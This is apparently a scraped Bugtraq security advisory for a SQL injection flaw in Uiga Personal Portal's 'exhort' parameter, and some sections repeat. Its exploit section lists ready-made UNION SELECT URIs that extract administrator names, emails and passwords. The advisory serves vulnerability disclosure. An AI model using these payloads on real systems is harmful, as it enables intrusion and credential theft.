Uiga Personal Portal 'view' Parameter SQL Injection Vulnerability
BID:39699
Info
Uiga Personal Portal 'view' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 39699 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 26 2010 12:00AM |
| Updated: | Apr 26 2010 12:00AM |
| Credit: | 41.w4r10r |
| Vulnerable: |
Uiga Uiga Personal Portal 0 |
| Not Vulnerable: | |
Exploit / POC
Uiga Personal Portal 'view' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
http://www.example.com/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_email,0x3a,admin_password),8,9,10,11+from+tbl_admin--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
http://www.example.com/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_email,0x3a,admin_password),8,9,10,11+from+tbl_admin--
Solution / Fix
Uiga Personal Portal 'view' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Uiga Personal Portal 'view' Parameter SQL Injection Vulnerability
References:
References: